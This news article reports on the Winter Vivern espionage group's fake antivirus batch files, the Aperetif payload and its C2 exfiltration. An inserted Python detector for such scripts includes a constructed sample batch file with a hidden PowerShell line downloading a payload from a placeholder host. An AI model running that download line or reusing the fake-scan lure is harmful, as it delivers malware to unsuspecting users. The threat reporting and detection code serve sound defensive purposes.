Winter Vivern APT hackers use fake antivirus scans to install malware

An advanced hacking group called ‘Winter Vivern’ targets European government organizations and telecommunication service providers to conduct espionage.

The group’s activities align with the interests of the Russian and Belarusian governments, so it is believed to be a pro-Russian APT (Advanced Persistent Threat) group.

SentinelLabs reports that the threat group operates with limited resources, but its creativity makes up for these limitations.

Recent activity

Winter Vivern was first documented by DomainTools in 2021 when it was seen targeting government organizations in Lithuania, Slovakia, the Vatican, and India.

In more recent campaigns observed by SentinelLabs, the hackers target people who work in the governments of Poland, Italy, Ukraine and India.

In addition to high-profile state targets, the hackers have also gone after telecommunications companies, such as those that have supported Ukraine since the Russian invasion.

In early 2023, hackers created webpages imitating those of the Polish Central Office for Combating Cyber-Crime, the Ukrainian Ministry of Foreign Affairs, and the Ukrainian Security Service.

Fake site imitating a Polish agency (SentinelLabs)

These sites distribute malicious files to visitors who arrive there by clicking links in phishing emails.

SentinelLabs has previously seen spreadsheet (XLS) files with malicious macros that launch PowerShell hosted on the cloned sites used by the APT.

Implementation of fake virus scanners

One example of Winter Vivern’s ingenuity in the SentinelLabs report is the group’s use of Windows batch files that impersonate antivirus scanners while actually downloading malicious payloads.

As seen in the batch files below, the malicious files simulate an antivirus scan, displaying a percentage of the scan remaining, while silently downloading a malicious payload using PowerShell.

Scripts that simulate fake antivirus scans (SentinelLabs)
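The combination described above, cosmetic "scanning... NN%" output plus a PowerShell download buried between the progress lines, is easy to triage statically. The following is an added example written for this page, not code from SentinelLabs or from the Winter Vivern scripts: a small Python heuristic that scores a batch file on that pattern. The indicator list (hidden-window and execution-policy switches, download cmdlets, `timeout`/`ping` delays) is general PowerShell and batch knowledge rather than specifics taken from the report, and the two sample batch files are constructed for the demonstration; the download URL in the malicious sample is a reserved `.invalid` host and is never fetched.

```python
"""Static triage of Windows batch files for the 'fake antivirus scan' lure.

Added example, not from the SentinelLabs report: flags batch files that
print a cosmetic scan progress while invoking a remote download.
"""
import re
from dataclasses import dataclass

# Heuristic indicators. These are general PowerShell/batch idioms assumed for
# the example, not indicators quoted from the report.
POWERSHELL_INVOKE = re.compile(r"\b(powershell(?:\.exe)?|pwsh(?:\.exe)?)\b", re.I)
DOWNLOAD_PRIMITIVES = re.compile(
    r"(DownloadFile|DownloadString|Invoke-WebRequest|\biwr\b|Invoke-RestMethod|"
    r"\birm\b|Start-BitsTransfer|System\.Net\.WebClient|\bcurl\b|\bwget\b)", re.I)
QUIET_SWITCHES = re.compile(
    r"(-w(?:indowstyle)?\s+hidden|-nop\b|-noprofile\b|-ep\s+bypass|"
    r"-executionpolicy\s+bypass|-enc(?:odedcommand)?\b)", re.I)
# Cosmetic scan output: echo lines carrying a percentage or scanner wording.
# In batch, a literal percent sign is written as %% inside echo.
FAKE_PROGRESS = re.compile(
    r"^\s*@?echo\b.*?(\d{1,3}\s*%|scan(?:ning)?\b|antivirus|threats?\s+found)", re.I | re.M)
DELAY = re.compile(r"(\btimeout\s+/t\b|\bping\b.*-n\s+\d+|\bsleep\b)", re.I)
URL = re.compile(r"https?://[^\s\"'<>)]+", re.I)


@dataclass
class Verdict:
    suspicious: bool       # fake progress output AND a download primitive
    score: int             # additive weight of all indicators seen
    indicators: list[str]  # human-readable reasons
    urls: list[str]        # any URLs found in the file


def triage_batch(text: str) -> Verdict:
    """Score one batch file's contents against the fake-scanner pattern."""
    indicators: list[str] = []
    score = 0
    lines = text.splitlines()

    progress = FAKE_PROGRESS.findall(text)
    if len(progress) >= 3:
        score += 2
        indicators.append(f"cosmetic scan/progress output ({len(progress)} echo lines)")
    if DELAY.search(text):
        score += 1
        indicators.append("artificial delay between progress lines")

    ps_lines = [l for l in lines if POWERSHELL_INVOKE.search(l)]
    if ps_lines:
        score += 1
        indicators.append(f"PowerShell invoked from batch ({len(ps_lines)} line(s))")
    dl_lines = [l for l in lines if DOWNLOAD_PRIMITIVES.search(l)]
    if dl_lines:
        score += 3
        indicators.append("remote download primitive present")
    if any(QUIET_SWITCHES.search(l) for l in ps_lines):
        score += 1
        indicators.append("PowerShell run hidden / no profile / policy bypass")

    urls = URL.findall(text)
    if urls:
        score += 1
        indicators.append(f"embedded URL(s): {', '.join(urls)}")

    suspicious = len(progress) >= 3 and bool(dl_lines)
    return Verdict(suspicious, score, indicators, urls)


# Constructed sample: the lure pattern described in the article, with a
# reserved .invalid host so nothing is ever fetched.
SAMPLE_FAKE_SCANNER = r"""@echo off
title Antivirus Scan
echo Starting full system scan...
timeout /t 2 /nobreak >nul
echo Scanning... 10%%
timeout /t 2 /nobreak >nul
echo Scanning... 45%%
powershell -w hidden -nop -ep bypass -c "(New-Object System.Net.WebClient).DownloadFile('http://example.invalid/payload.bin',$env:TEMP+'\payload.bin')"
echo Scanning... 90%%
timeout /t 2 /nobreak >nul
echo Scan complete. 0 threats found.
"""

# Constructed benign control: an ordinary admin script with no download.
SAMPLE_BENIGN = r"""@echo off
echo Backing up logs...
xcopy C:\logs D:\backup\logs /E /I /Y >nul
echo Done.
"""

if __name__ == "__main__":
    for name, sample in (("fake scanner", SAMPLE_FAKE_SCANNER), ("benign", SAMPLE_BENIGN)):
        v = triage_batch(sample)
        print(f"{name}: suspicious={v.suspicious} score={v.score}")
        for reason in v.indicators:
            print(f"  - {reason}")
```

The verdict deliberately requires both halves of the lure, the cosmetic progress output and a download primitive, so that a plain PowerShell download in an installer script is reported with a score but not flagged as this specific social-engineering pattern. Any URL the heuristic extracts should be checked against the report's published indicators rather than treated as malicious on its own.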

The payload delivered through this process is called “Aperetif”, which the Ukrainian CERT (CERT-UA) documented in detail in a February 2023 report.

The malware is hosted on compromised WordPress websites, a hosting method commonly used in malware distribution campaigns.

The Aperetif malware can automatically scan for and exfiltrate files, take screenshots, and send all collected data in base64-encoded form to a hardcoded command and control (C2) server URL (marakanas[.]com).

SentinelLabs recently discovered a new payload used by Winter Vivern that appears similar in functionality to Aperetif but has an incomplete design, indicating that it is a work in progress.

In both cases, which overlap in their implementation, the malware beacons to the C2 server using PowerShell and waits for further instructions or payloads.

In conclusion, Winter Vivern uses a relatively simple but effective approach to lure its targets into downloading malicious files, and its low profile has helped it avoid being reported.


James D. Brown